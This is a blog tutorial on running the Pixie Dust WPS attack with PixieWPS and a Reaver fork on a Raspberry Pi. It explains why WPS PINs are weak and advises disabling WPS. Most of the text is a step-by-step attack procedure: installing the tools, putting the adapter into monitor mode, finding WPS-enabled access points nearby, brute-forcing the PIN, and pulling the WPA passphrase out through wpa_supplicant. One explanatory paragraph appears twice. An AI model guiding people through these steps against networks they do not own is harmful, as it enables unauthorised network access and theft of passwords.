0 Google+ 0 Reddit 4 StumbleUpon 0 Pinterest 0

About: WPS stands for Wi-Fi Protected Setup and it is a wireless networking standard that tries to make connections between a router and your wireless devices faster and easier. It only works for wireless networks that have WPA/WPA2 security. It is suppose to make it easier to connect devices without a keyboard, like a TV, to your home network. Most routers come with WPS enabled and work by pushing the WPS button on your router and connecting your device. I personally have never heard or WPS before doing this research and have never used it in my personal life.

WPS works by having the router generate an eight-digit PIN that you need to enter on your devices to connect. WPS can easily be cracked because rather than the router check the entire eight-digit PIN at once, the router checks the first four digits separately from the last four digits. This makes WPS PINs very easy to brute force. There are only 11,000 possible four-digit codes, and once the brute force software gets the first four digits right, the attacker can move on to the rest of the digits. Many modern routers try to prevent this by timing out incorrect pins after a certain time, but this is still not the norm.

Many routers come with WPS enabled and it can be disabled. You can follow my tutorial on how to disable WPS on my Netgear router here. The best router to purchase that will remain secure from this kind of attack is a router that doesn’t even provide WPS.

Objective: To demonstrate how insecure having WPS enabled on your router

Material: You will need the following:

Raspberry Pi (I have PwnPi 3.0 running on mine)

USB WiFi Adapter – I use the Panda USB WiFi adapter

Instructions: I am using PwnPi on my Raspberry Pi but this can also be performed using Raspbian. Let’s start by installing some software and the tools we will be using. I will assume you have the aircrack-ng suite already installed and know how to use your WiFi USB adapter.

apt-get update apt-get install build-essential libsqlite3-dev libpcap-dev sqlite3 1 2 apt - get update apt - get install build - essential libsqlite3 - dev libpcap - dev sqlite3

This will install the dependencies we need to run PixieWPS and Reaver in a minute. Next we will install PixieWPS from source. Start by downloading the latest PixieWPS from GitHub

wget https://github.com/wiire/pixiewps/archive/master.zip && unzip master.zip 1 wget https : //github.com/wiire/pixiewps/archive/master.zip && unzip master.zip

Once the download is done let’s build and install PixieWPS

cd pixiewps*/ cd src/ make make install cd ~ rm master.zip 1 2 3 4 5 6 cd pixiewps* / cd src / make make install cd ~ rm master . zip

This will build and install PixieWPS on our Raspberry Pi. Next we will need to download a ported version of Reaver that was modified to work with PixieWPS

wget https://github.com/t6x/reaver-wps-fork-t6x/archive/master.zip && unzip master.zip 1 wget https : //github.com/t6x/reaver-wps-fork-t6x/archive/master.zip && unzip master.zip

This will download the latest cloned version of Reaver. Now we will build and install it.

cd reaver-wps-fork-t6x-master/ cd src/ ./configure make make install cd ~ rm master.zip 1 2 3 4 5 6 7 cd reaver - wps - fork - t6x - master / cd src / . / configure make make install cd ~ rm master . zip

We should now have our tools setup and ready to crack the WPS. We need to start by putting our wireless interface into monitor mode using airmon-ng start <wireless interface> . My wireless interface is wlan0. Use the ‘iwconfig’ to find yours. If you run the command below and airmon-ng gives you errors that certain processes are running and may interfere you can either kill them manually or type the ‘airmon-ng check kill’ command which will check the processes and kill them automatically.

airmon-ng start wlan0 1 airmon - ng start wlan0

This should create a monitor interface on ‘mon0’. Now we will use wash to find access points in our area that have WPS enabled. Simple run ‘wash -i <monitor-interface>’

wash -i mon0 1 wash - i mon0

This will download the latest cloned version of Reaver. Now we will build and install it.We should now have our tools setup and ready to crack the WPS. We need to start by putting our wireless interface into monitor mode using airmon-ng start . My wireless interface is wlan0. Use the ‘iwconfig’ to find yours. If you run the command below and airmon-ng gives you errors that certain processes are running and may interfere you can either kill them manually or type the ‘airmon-ng check kill’ command which will check the processes and kill them automatically.This should create a monitor interface on ‘mon0’. Now we will use wash to find access points in our area that have WPS enabled. Simple run ‘wash -i ’

We will need the BSSID and channel # for the access point you want to attack. Make sure you have a strong signal before attempting this attack or Reaver will generate weird errors. After you grab the information simply type in the following command: ‘reaver -i <monitor interface> -b <BSSID of router> -c <router channel> -vvv -K 1 -f’ You may add a -N at the end of the command for no-nacks which may help if the signal is not the best.

reaver -i mon0 -b 9C:D3:6D:02:3A:E0 -c 11 -vvv -K 1 -f 1 reaver - i mon0 - b 9C : D3 : 6D : 02 : 3A : E0 - c 11 - vvv - K 1 - f



Now you can see that I got the pin but I was unable to locate the pass-phrase. It will sit at this screen until I hit CTRL+C to cancel the command. You may not get this screen and your command will continue. It will spit out the PSK which means at this point you would be done. If you get the Pin but no PSK then we need to take a few more steps. In attempting to hack my own router you can see that my pin is ‘29066810’. Write this information down as well as the BSSID again. That’s all that we will need to finish up.

We will use ‘wpa_supplicant’ to connect to our Access Point manually and recover the PSK. Let’s start by configuring our wpa_supplicant.conf file

nano /etc/wpa_supplicant.conf 1 nano / etc / wpa_supplicant . conf

This should open up the .conf file and we will add the following lines. Note: Your file may be empty which is not a problem.

ctrl_interface=/var/run/wpa_supplicant ctrl_interface_group=0 update_config=1 1 2 3 ctrl_interface = / var / run / wpa_supplicant ctrl_interface_group = 0 update_config = 1

Hit CTRL+X to save the file and exit. We will now startwpa_supplicant with the following command:

wpa_supplicant -Dwext -iwlan0 -c/etc/wpa_supplicant.conf –B 1 wpa_supplicant - Dwext - iwlan0 - c / etc / wpa_supplicant . conf – B

You may get some invalid argument errors, but that’s okay. Leave this window open and open up a new terminal or ssh window. We will now be running wpa_cli and running commands manually.

wpa_cli 1 wpa_cli

You should now get a command prompt window where you can enter commands. Type ‘status’ and you should see a ‘wpa_state=INACTIVE’ return. Once you have done this we will add our BSSID and the Pin we got from Reaver. Type the following command into wpa_cli ‘wps_reg <BSSID> <Pin>’

wps_reg 9C:D3:6D:02:3A:E0 29066810 1 wps _ reg 9C : D3 : 6D : 02 : 3A : E0 29066810

This should take a few seconds and attempt to associate with the Access Point. We are looking for a ‘CTRL-EVENT-CONNECTED’ to return. When we see this we know that our Pin was accepted and we are associated with the Access Point. When this is complete hit CTRL+C to exit wpa_cli. We will now run dhclient to get an IP address assigned to us in case one was not automatically assigned. Run the following command:

dhclient wlan0 1 dhclient wlan0

Now return to wpa_cli and type ‘save’ which should return an ‘OK’. This will save data to our wpa_supplicant.conf file. Now we can exit wpa_cli again by typing CTRL+C. Read the wpa_supplicant.conf file with the following command and look for the PSK.

cat /etc/wpa_supplicant.conf 1 cat / etc / wpa_supplicant . conf

As you can see my PSK is ‘www.kamilslab.com’. That’s it, using the Pixie WPS attack is very easy and works a lot faster then Reaver. The only downside is that not every router will work with the Pixie WPS attack. This is a newer attack, so it still works quite well and usually takes under a minute to crack the pin compared to Reaver that takes around 12 hours and is slowly getting phased out with newer routers.

If you have any questions post a comment below and I’ll try to help you out.